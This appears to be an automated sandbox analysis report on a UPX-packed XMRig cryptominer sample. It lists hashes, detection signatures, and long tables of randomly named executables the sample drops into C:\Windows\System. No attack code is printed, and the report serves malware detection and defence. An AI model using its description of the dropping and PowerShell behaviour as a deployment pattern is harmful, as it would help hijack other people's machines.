Malware Analysis Report

2024-09-10 20:18

Sample ID 240613-3p9b5szbpr
Target 6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3
SHA256 6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3

Threat Level: Known bad

The file 6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3 was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

Xmrig family

Detects executables containing URLs to raw contents of a Github gist

XMRig Miner payload

UPX dump on OEP (original entry point)

xmrig

XMRig Miner payload

UPX dump on OEP (original entry point)

Detects executables containing URLs to raw contents of a Github gist

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

UPX packed file

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 23:42

Signatures

Detects executables containing URLs to raw contents of a Github gist

Description Indicator Process Target
N/A N/A N/A N/A

UPX dump on OEP (original entry point)

Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 23:42

Reported

2024-06-13 23:45

Platform

win7-20240220-en

Max time kernel

149s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe"

Signatures

xmrig

miner xmrig

Detects executables containing URLs to raw contents of a Github gist

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX dump on OEP (original entry point)

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\FfVndNF.exe N/A
N/A N/A C:\Windows\System\llSHySI.exe N/A
N/A N/A C:\Windows\System\wVXsIox.exe N/A
N/A N/A C:\Windows\System\CYaIgYH.exe N/A
N/A N/A C:\Windows\System\nVbdTzY.exe N/A
N/A N/A C:\Windows\System\tMgOoUw.exe N/A
N/A N/A C:\Windows\System\dAQyTqN.exe N/A
N/A N/A C:\Windows\System\DAFYvPk.exe N/A
N/A N/A C:\Windows\System\dYzsBxK.exe N/A
N/A N/A C:\Windows\System\FfKsjAm.exe N/A
N/A N/A C:\Windows\System\jtCxZJv.exe N/A
N/A N/A C:\Windows\System\tJOEUEw.exe N/A
N/A N/A C:\Windows\System\TpkqoNA.exe N/A
N/A N/A C:\Windows\System\IwRawcL.exe N/A
N/A N/A C:\Windows\System\vDLlHmF.exe N/A
N/A N/A C:\Windows\System\CjQgaty.exe N/A
N/A N/A C:\Windows\System\odTtZfG.exe N/A
N/A N/A C:\Windows\System\LYiABLS.exe N/A
N/A N/A C:\Windows\System\MowaUVv.exe N/A
N/A N/A C:\Windows\System\VqFbeRe.exe N/A
N/A N/A C:\Windows\System\ABLgFgU.exe N/A
N/A N/A C:\Windows\System\kQKSDoh.exe N/A
N/A N/A C:\Windows\System\MvLfXbp.exe N/A
N/A N/A C:\Windows\System\vxHpUDx.exe N/A
N/A N/A C:\Windows\System\UPqFffY.exe N/A
N/A N/A C:\Windows\System\jsUsKBi.exe N/A
N/A N/A C:\Windows\System\mUwtJJg.exe N/A
N/A N/A C:\Windows\System\jkhrtYs.exe N/A
N/A N/A C:\Windows\System\FqgWpFu.exe N/A
N/A N/A C:\Windows\System\AlpnrbW.exe N/A
N/A N/A C:\Windows\System\EUTgGGF.exe N/A
N/A N/A C:\Windows\System\OcaOFDU.exe N/A
N/A N/A C:\Windows\System\EAdZMyE.exe N/A
N/A N/A C:\Windows\System\cPOEsuV.exe N/A
N/A N/A C:\Windows\System\vXLzwzF.exe N/A
N/A N/A C:\Windows\System\dZGEQAE.exe N/A
N/A N/A C:\Windows\System\IVCRiIc.exe N/A
N/A N/A C:\Windows\System\jlBVpnZ.exe N/A
N/A N/A C:\Windows\System\FyQuPiQ.exe N/A
N/A N/A C:\Windows\System\ZASCigA.exe N/A
N/A N/A C:\Windows\System\UxKEWZL.exe N/A
N/A N/A C:\Windows\System\QCeCoJv.exe N/A
N/A N/A C:\Windows\System\EDmVOab.exe N/A
N/A N/A C:\Windows\System\ApjYVYN.exe N/A
N/A N/A C:\Windows\System\ZjHKYod.exe N/A
N/A N/A C:\Windows\System\RdzDpmX.exe N/A
N/A N/A C:\Windows\System\CNRcKwk.exe N/A
N/A N/A C:\Windows\System\zoIQNEl.exe N/A
N/A N/A C:\Windows\System\LlIUSxq.exe N/A
N/A N/A C:\Windows\System\wqbfAyo.exe N/A
N/A N/A C:\Windows\System\KthHqDt.exe N/A
N/A N/A C:\Windows\System\dkTaZiN.exe N/A
N/A N/A C:\Windows\System\VlMBuLn.exe N/A
N/A N/A C:\Windows\System\LxzUaMH.exe N/A
N/A N/A C:\Windows\System\glTqwZY.exe N/A
N/A N/A C:\Windows\System\JWnFRMg.exe N/A
N/A N/A C:\Windows\System\uWAtFtU.exe N/A
N/A N/A C:\Windows\System\hfmKEWY.exe N/A
N/A N/A C:\Windows\System\CGFRojJ.exe N/A
N/A N/A C:\Windows\System\DfHkAPi.exe N/A
N/A N/A C:\Windows\System\XdLDBmI.exe N/A
N/A N/A C:\Windows\System\BSQHlQE.exe N/A
N/A N/A C:\Windows\System\VRkTqzr.exe N/A
N/A N/A C:\Windows\System\EqwEVjB.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\KxinYee.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\egJyxCv.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\ZFUknzU.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\ycDhejt.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\fILntVs.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\mhyAhjg.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\FtotFzN.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\INytXBD.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\VfXnPrD.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\UYofrxg.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\XkiLdxs.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\QpUppcv.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\KBnfQYM.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\XeZzkYU.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\pbIHWIL.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\UkJqusp.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\KrxJOtE.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\JwbpWUK.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\eazQYud.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\LHRbxAi.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\YzHLnzo.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\HFnLTqL.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\AHCSFKS.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\msGyhOA.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\QMLublv.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\NLbIVBA.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\ZGgABsr.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\xohowFE.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\bFSwBPG.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\InVjeQO.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\MlCsGTx.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\SexZCXq.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\rSlkJsF.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\QkFRexV.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\XmWRqHj.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\VXjcRPP.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\wdZcRyV.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\bKqHhll.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\aKVGIJW.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\CWAEkxz.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\IPeFBJc.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\gAYBghS.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\EHZhbsW.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\tLvSVCl.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\ERbBxyy.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
